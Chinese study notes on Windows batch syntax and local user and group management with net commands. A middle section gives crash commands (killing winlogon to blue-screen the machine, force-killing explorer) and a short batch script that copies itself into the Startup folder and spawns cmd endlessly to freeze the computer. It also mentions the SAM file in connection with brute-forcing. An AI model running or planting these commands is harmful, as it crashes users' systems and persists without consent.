批处理编写和用户管理

一、批处理编写

1.1 批处理作用

自上而下成批的处理每一条命令，直到执行最后一条!

1.2 如何创建批处理

文件扩展名：.bat

创建方法：新建一个记事本文件，然后将扩展名改为.bat

注：修改扩展名时，需要将文件扩展名显示出来

1.3 批处理基本语法

1.3.1 @echo off        

作用：关闭回显功能，也就是屏蔽过程，不显示命令，建议放在批处理的首行。

1.3.2 pause            

作用：暂停批处理运行

1.3.3 title

作用：为批处理脚本设置标题

1.3.4 echo.            

作用：在执行批处理脚本时，可以空一行

1.3.5 set

作用：设置变量，常用于脚本中的互动赋值

互动赋值：set /p time=请输入时间：

引用变量：%time%

1.3.6 :和goto

:定义标签名

goto实现跳转

两者是分不开的，无论少了哪个或多了哪个都会报错。当程序运行到goto时将自动跳转到定义好的标签部分去执行命令块了

==================================

ntsd -c q -pn winlogon.exe 关掉window的登录进程（针对xp或2003的蓝屏命令）

taskkill /im explorer.exe /f >nul 2>nul  强制杀死桌面进程，不提示执行是否成功

start 打开一个文件，什么都不写就打开cmd

color 0a 设置底色为黑，字为绿，color ？可以查看颜色

%userprofile%        # 取变量userprofile的值（当前用户家目录）

===================================

下面的批处理文件运行时会将此文件复制到当前用户的启动文件夹下，在下次系统启动时会自运行，因为这个goto一直死循环执行自身，不断打开cmd，会将CPU占满，电脑蓝屏死机。（下面第一条命令中的复制位置有特殊符号，还有变量，需要加入双引号）

===================================

copy 文件名.bat "%userprofile%\「开始」菜单\程序\启动"

:d

start

goto d

===================================

二、用户与组管理

1、服务器系统版本介绍

Windows服务器系统：win2000 win2003 win2008 win2012

Linux服务器系统：Redhat Centos

2、用户与组管理

2.1 用户概述

每一个用户登陆系统后，拥有不同的操作权限。
每个账户有自己唯一的SID（安全标志符）
用户SID：S-1-5-21-426206823-2579496042-14852678-500
系统SID：S-1-5-21-426206823-2579496042-14852678
用户UID：500
windows系统管理员 administrator 的UID是 500
普通用户的UID是1000开始
不同的账户拥有不同的权限，为不同的账户赋权限，也就是为不用账户的SID赋权限！查看SID值：whoami /user
账户密码存储的位置：C:\Windows\System32\config\SAM #暴力破解/撞库
windows系统上，默认密码最长有效期为42天

2.2  内置账户
*给人使用的账户：
        administrator  #管理员账户
        guest  #来宾账户（默认禁用，权限最低）
*计算机服务组件相关的系统账号
        system  #系统账户 == 权限至高无上
        local services  #本地服务账户 == 普通权限
        network services  #网络服务账户 == 普通权限

*配置文件

    每个用户都有自己的配置文件（家目录），在用户第一次登陆时自动产生，路径：

    win7/win8/win10  C:\用户\用户名

     xp/win2003          C:\Documents and Settings\用户名

net user                       # 查看用户列表
net user 用户名                 # 查看用户详细信息
net user 用户名 密码             # 改密码
net user 用户名 密码 /add        # 创建一个新用户
net user 用户名 /del            # 删除一个用户
net user 用户名 /active:yes/no  # 激活或禁用账户

3、组管理

3.1 组概述
组的作用：简化权限的赋予
赋权限方式：
1）用户-组-赋权限
2）用户-赋权限

3.2 内置组

内置组的权限默认已经被系统赋予

administrators      #管理员组
guests      #来宾组
users      #普通用户组，默认
network      #网络适配组
print      #打印机组
Remote Desktop      #远程桌面组
net localgroup                  # 查看组列表
net localgroup 组名              # 查看组的成员
net localgroup 组名 /add         # 创建一个新的组
net localgroup 组名 用户名 /add   # 添加用户到组
net localgroup 组名 用户名 /del   # 将用户从组中删除
net localgroup 组名 /del         # 删除组

===============================================

Windows中图形化界面查看用户和组

我的电脑图标选中右键点击管理

 本地用户和组可以查看用户和组

===============================================